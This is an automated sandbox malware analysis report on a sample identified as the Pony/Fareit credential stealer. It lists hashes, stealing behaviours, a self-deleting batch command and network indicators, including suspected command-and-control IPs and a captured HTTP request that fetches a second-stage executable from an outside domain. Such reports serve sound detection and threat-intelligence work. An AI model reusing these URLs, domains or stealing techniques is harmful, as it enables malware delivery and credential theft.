Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
16/01/2025, 21:25 UTC
General
-
Target
24e62f812d15415d1f950f704da6e15da678b3a2e1315be2aa0d262f1e5425c5.exe
-
Size
92KB
-
MD5
5a058837d9999de9f669dcda66ed1d31
-
SHA1
df675fda6651012df81f9959d040ddfaff160dcb
-
SHA256
24e62f812d15415d1f950f704da6e15da678b3a2e1315be2aa0d262f1e5425c5
-
SHA512
c643c85b03884639fa06e00a77b247adaa4f29601ad3bd7152c25780d45ff03016352d24bc1fb5afda14466629fff57eeffaa8eb5f022941642ca5abfab7a44e
-
SSDEEP
1536:umAzsn5qsEgGnktdBpEgxQ7GIoTpg6SBNMlX22snxnBq1MfQVxcGifoMG1lh7G:uTsn5qsELktiGQ722lNfLJ6IyNr9
Malware Config
Signatures
-
Pony family
-
Pony,Fareit
Pony is a Remote Access Trojan application that steals information.
-
Deletes itself 1 IoCs
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\24e62f812d15415d1f950f704da6e15da678b3a2e1315be2aa0d262f1e5425c5.exe"C:\Users\Admin\AppData\Local\Temp\24e62f812d15415d1f950f704da6e15da678b3a2e1315be2aa0d262f1e5425c5.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\ytk.bat" "C:\Users\Admin\AppData\Local\Temp\24e62f812d15415d1f950f704da6e15da678b3a2e1315be2aa0d262f1e5425c5.exe" "2⤵
- Deletes itself
- System Location Discovery: System Language Discovery
-
Network
-
DNSlayout.cnt.brRemote address:8.8.8.8:53Requestlayout.cnt.brIN AResponse -
DNSbeyondcreativehm.comRemote address:8.8.8.8:53Requestbeyondcreativehm.comIN AResponse
-
DNSfair-trans.atRemote address:8.8.8.8:53Requestfair-trans.atIN AResponsefair-trans.atIN A85.124.51.140
-
GEThttp://fair-trans.at/GTsvZ4j3/WtS.exeRemote address:85.124.51.140:80RequestGET /GTsvZ4j3/WtS.exe HTTP/1.0
Host: fair-trans.at
Accept: */*
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
ResponseHTTP/1.1 404 Not Found
Date: Thu, 16 Jan 2025 21:27:02 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Last-Modified: Wed, 17 Nov 2021 07:11:12 GMT
Accept-Ranges: bytes
Content-Length: 12650
Vary: Accept-Encoding,User-Agent
Strict-Transport-Security: max-age=15768000
Content-Type: text/html
-
178.77.99.145:8080 -
203.113.133.2:8080 -
91.121.20.136:8080
-
85.124.51.140:80http://fair-trans.at/GTsvZ4j3/WtS.exehttp
HTTP Request
GET http://fair-trans.at/GTsvZ4j3/WtS.exeHTTP Response
404
-
8.8.8.8:53layout.cnt.brdns
DNS Request
layout.cnt.br
-
8.8.8.8:53beyondcreativehm.comdns
DNS Request
beyondcreativehm.com
-
8.8.8.8:53fair-trans.atdns
DNS Request
fair-trans.at
DNS Response
85.124.51.140
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
71B
MD5e6b031b9b7d40fa332ebc6f38b2f9f64
SHA1d6dbffcfcc6a26188fd8d2e5b6257af4821fb48f
SHA25666a04ff993916bce61351e4c3b94ea079c806efb1723c7cd79bd32aaf6847e0b
SHA5127d17655334fcda4c3326110d340fd91cd23ee284dec99c3a8bbc8408342fda5f51e27aaba75fba4cccd513c342c22f07ad2cf6e2326ba575e3cc0eba4ea91948
-
Filesize
1024KB
-
Filesize
84KB
-
Filesize
188KB
-
Filesize
84KB